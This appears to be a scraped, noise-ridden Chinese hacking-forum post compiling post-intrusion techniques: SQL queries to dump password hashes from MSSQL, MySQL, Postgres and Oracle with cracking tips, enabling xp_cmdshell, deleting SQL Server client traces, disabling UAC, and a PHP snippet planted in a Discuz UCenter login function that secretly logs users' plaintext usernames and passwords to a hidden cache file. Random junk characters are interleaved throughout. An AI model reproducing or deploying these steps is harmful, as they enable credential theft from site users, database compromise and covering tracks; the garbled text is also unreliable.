* t' M+ i3 F/ W+ H" E( y5 C0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341( _' o4 e0 Z- v) J( t/ F! t+ U
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A& D. n/ M# h8 r3 y) R
* U+ y- z7 o9 N0 T3 z7 {% `
0×0100- constant header
# n2 Q- I( T" c0 P0 E$ U34767D5C- salt
8 S" l2 ]/ q5 @8 l9 h0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash5 F0 E$ O. N1 o1 B
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
# J# \1 m: ]: ~# P3 `crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
6 V, x$ C( s/ W; ] RSQL server 2005:-
9 E/ W" ]( e$ }; Y9 D: QSELECT password_hash FROM sys.sql_logins where name='sa'* |( Y3 K* g( a7 ~7 s& ]
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F, M0 _" I( Y# i$ u5 N* D
0×0100- constant header
. V% p5 h! f1 Z3 Q+ ~* m993BF231-salt* T% p2 H' B% a [3 O
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
1 v- f: E$ V8 q& a3 Ncrack case sensitive hash in cain, try brute force and dictionary based attacks.3 b0 n8 P( N# s2 H$ q" D' a2 H
' y# l3 u2 t2 x4 t7 H5 |update:- following bernardo’s comments:-
( \5 T/ ~" f% P( v: H$ luse function fn_varbintohexstr() to cast password in a hex string.
8 ~1 F1 s1 K* T9 Ce.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins/ h* i0 a+ _$ t7 E' \: h X6 h
1 I; {& H7 Z1 F; C5 {MYSQL:-! h8 B+ W2 M6 D% I6 C2 i% ^& a7 X
# D. I% V) e4 C) l
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
2 H- D; S0 p6 \( @, s. ^; {- n$ q& ]3 ^4 {6 p& l8 i) e
*mysql < 4.1; k3 x: B/ f% P! I& G" M
7 f j$ g: e( S4 e. N4 Q4 a4 e( v
mysql> SELECT PASSWORD(‘mypass’);, _( \. U% z% K6 \+ [ p; a" \
+——————–+7 N6 \9 `8 c! J2 ?( q) Z9 Q4 {
| PASSWORD(‘mypass’) |1 p7 {, W- h! Q6 _& d# G
+——————–+
/ f' b) X4 J7 |7 d5 \( `+ I* N" P/ ]| 6f8c114b58f2ce9e |
~" S) f9 x+ u3 H8 \& M+——————–+
* Z- c2 T9 C9 E" U% w9 d1 Q- H- b
* A T1 @% a; M( R9 J*mysql >=4.1
' c k" w) W9 V8 g- G
$ Z0 q/ c7 }1 ^5 J* ymysql> SELECT PASSWORD(‘mypass’);
" N/ p& r, h; p+——————————————-+5 H1 N9 a6 C3 c
| PASSWORD(‘mypass’) |5 [- m, q. p; F1 _) I# x/ ~
+——————————————-+
6 s' ~2 F0 D& v* Q2 B| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |5 Z x* m$ l. D5 m$ s3 c( x7 }
+——————————————-+
. A0 n: `2 l4 J Q( V m7 |9 J# ]2 s* Q5 q* V: E
Select user, password from mysql.user/ k7 z4 r% d2 C4 _
The hashes can be cracked in ‘cain and abel’
/ l R1 o2 S% F$ ]
) x) d" R$ n+ v$ l! yPostgres:-
D1 Z4 c5 \. I! l9 ZPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)- F; B8 R' T v
select usename, passwd from pg_shadow;
0 P' S% f$ [4 Cusename | passwd
; }; l) K7 d* k# S" ]——————+————————————-
/ H! L @6 j8 i$ btestuser | md5fabb6d7172aadfda4753bf0507ed4396
$ s5 t4 E) V; o# vuse mdcrack to crack these hashes:-
* v- {2 {+ x W* r) g+ y* k* Q$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396: k& q- P! Z2 w# S1 J8 S1 y. ^
) J% F" a! D/ g: t( l! W
Oracle:-: N+ k. V, j s; p& Z* z$ W# X
select name, password, spare4 from sys.user$
b9 n( W' k/ Ihashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
# S8 m6 r/ p- C9 T5 e1 [2 Z% mMore on Oracle later, i am a bit bored….5 [9 X0 y& z4 S3 P- K
, C( I+ {6 Z& m5 s
- ]9 e3 f# N4 R- F$ k3 y" k' v1 f
在sql server2005/2008中开启xp_cmdshell" d/ ?; W" C5 m* W" f, c% p
-- To allow advanced options to be changed.4 I, `* V4 F3 U. A
EXEC sp_configure 'show advanced options', 1
$ ?+ D4 a( Q4 L5 p0 F0 |7 XGO
2 f) q- l2 t! \2 J7 u: ?5 s-- To update the currently configured value for advanced options.
2 Z0 N# _) c0 o) j4 C5 O2 @RECONFIGURE
( _- S- X# j$ e& g4 Y' ?GO
: @, z- J& E$ l) v5 V8 u-- To enable the feature.
+ R3 o7 A* F+ O c) EEXEC sp_configure 'xp_cmdshell', 1
+ y& Z; @; p- B5 ?) uGO0 J2 f- X6 o- U: f
-- To update the currently configured value for this feature.
: s; l$ ~5 T1 C4 \2 a$ Z ~4 @RECONFIGURE
* ^ x) e1 l/ d% _' rGO' R+ e, d3 ^6 B
SQL 2008 server日志清除,在清楚前一定要备份。
; h3 B7 ~! X8 P" f% `; |) _* u+ L如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:2 T1 Y1 k1 h2 U6 H$ N
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin& S) K( [7 \# l8 N# h! g; ~8 p7 }& q
& J* ?+ t0 o! N% K. J$ P
对于SQL Server 2008以前的版本:
' t: C# N( n$ x7 Z- oSQL Server 2005: `) i& W; C0 k! N
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
$ L! f) T6 ]1 B5 x4 c# t+ G& d# TSQL Server 2000:- j# W, @0 y! ]% `; K
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
: K& Q) R. L7 {: }' E4 @5 r0 J
' B, y, T! z) W2 x3 Y本帖最后由 simeon 于 2013-1-3 09:51 编辑$ K: y& o3 {; D, I6 `- f
9 Q; [% X( W" D3 Q- l
9 x2 q q. X$ a
windows 2008 文件权限修改
3 r1 u" P0 [4 Q0 w. y1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx) t, t8 \: R, A- ^7 v/ H
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98; [1 o: I6 L$ I$ H% q5 z& g& x7 ^
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,+ S1 c# X' R i: R1 N! z/ _
8 Z& ?$ O- [# _Windows Registry Editor Version 5.00
% ?6 y# g& l4 D: w* C+ ]0 ^[HKEY_CLASSES_ROOT\*\shell\runas]1 C: h3 y8 J* U. V8 G
@="管理员取得所有权"
1 p* [6 G. S, k, s1 j% q"NoWorkingDirectory"=""
$ ~& z) S' o' h& h3 {[HKEY_CLASSES_ROOT\*\shell\runas\command]# |0 l0 A1 c$ O/ f) Z7 a
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& A" |: x' K7 t9 Q+ S"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"; s) ?# F% H% t, @/ z4 u
[HKEY_CLASSES_ROOT\exefile\shell\runas2]1 b8 B Z" z5 a4 S' |/ L! L
@="管理员取得所有权"
# `5 e2 O% g1 B0 F"NoWorkingDirectory"=""2 E2 K8 A2 m2 r9 A5 d) ~3 D3 H
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
1 T2 J9 _( X7 N3 ?@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"! c3 ]/ L3 I/ ^- `* x4 n) B1 _
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 n0 t8 V+ _8 y! @
% O3 n5 x. n( J+ L/ D[HKEY_CLASSES_ROOT\Directory\shell\runas]3 [" Z0 ?# ^" i2 V2 ^+ K
@="管理员取得所有权"" S. R, n: m# m0 T
"NoWorkingDirectory"=""
- p. p5 b" d4 C& z; d5 |1 |0 ]: t[HKEY_CLASSES_ROOT\Directory\shell\runas\command]( p) `3 d" L5 Z$ g# K
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
: [% ^# z7 G$ [- N"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t", p4 E) n1 x7 q7 u9 x. [4 ?7 O
) _9 v& T% t9 \! g; _
( }5 t1 ~0 l( K3 _1 y- `win7右键“管理员取得所有权”.reg导入9 X& @% x1 h4 G9 k( I
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
$ W& Q8 g1 z! x) ^; _9 F1、C:\Windows这个路径的“notepad.exe”不需要替换9 Q3 V7 c( n8 F* z$ Z6 Z
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换$ [; L$ D, O; [7 e* e* R: `( X
3、四个“notepad.exe.mui”不要管5 X: K8 o" d4 N' h/ M1 L; {
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
( ?' [! v, o3 r FC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
5 [0 H6 W% e% ~: P/ ~. _5 c: i$ e5 r替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,1 P+ k, y* ^7 a" U T+ @; M& I1 [
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。# b3 E, c1 t- B6 ~
windows 2008中关闭安全策略: $ ]- L; U+ S- `& w% i) F; q
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f; f4 t( C) i K: W
修改uc_client目录下的client.php 在# m7 b- ~- _ B1 x- H1 G6 i7 B$ F
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
3 G9 K, V! E0 a# ]( z3 W' o. x下加入如上代码,在网站./data/cache/目录下自动生成csslog.php$ N( V5 C- z0 \% n/ H; D* r
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw0 A/ I7 t8 ] B8 `! I# g* x- y9 I& F
if(getenv('HTTP_CLIENT_IP')) {
- x' {9 b- v) q$onlineip = getenv('HTTP_CLIENT_IP');+ {) w9 G7 Z. W% ?
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {6 G) c4 V4 H6 I" E; o
$onlineip = getenv('HTTP_X_FORWARDED_FOR');' d5 h8 \3 f' Q" W i& ~9 E L
} elseif(getenv('REMOTE_ADDR')) {
+ R% y' h6 ]2 z& I" m$onlineip = getenv('REMOTE_ADDR');
' p5 \/ C4 P- ?* G} else {5 v4 k. x1 @- P) k* \ A
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
# e l+ w4 Q6 @- P; s6 T}. B: Y2 Z f1 R+ Z6 Q" P
$showtime=date("Y-m-d H:i:s");
$ @+ `$ ]" U, g $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
& F, r- \$ J9 W& K* p7 m Y $handle=fopen('./data/cache/csslog.php','a+');, j2 [, Q3 T3 H! `, `/ R) E3 p
$write=fwrite($handle,$record); |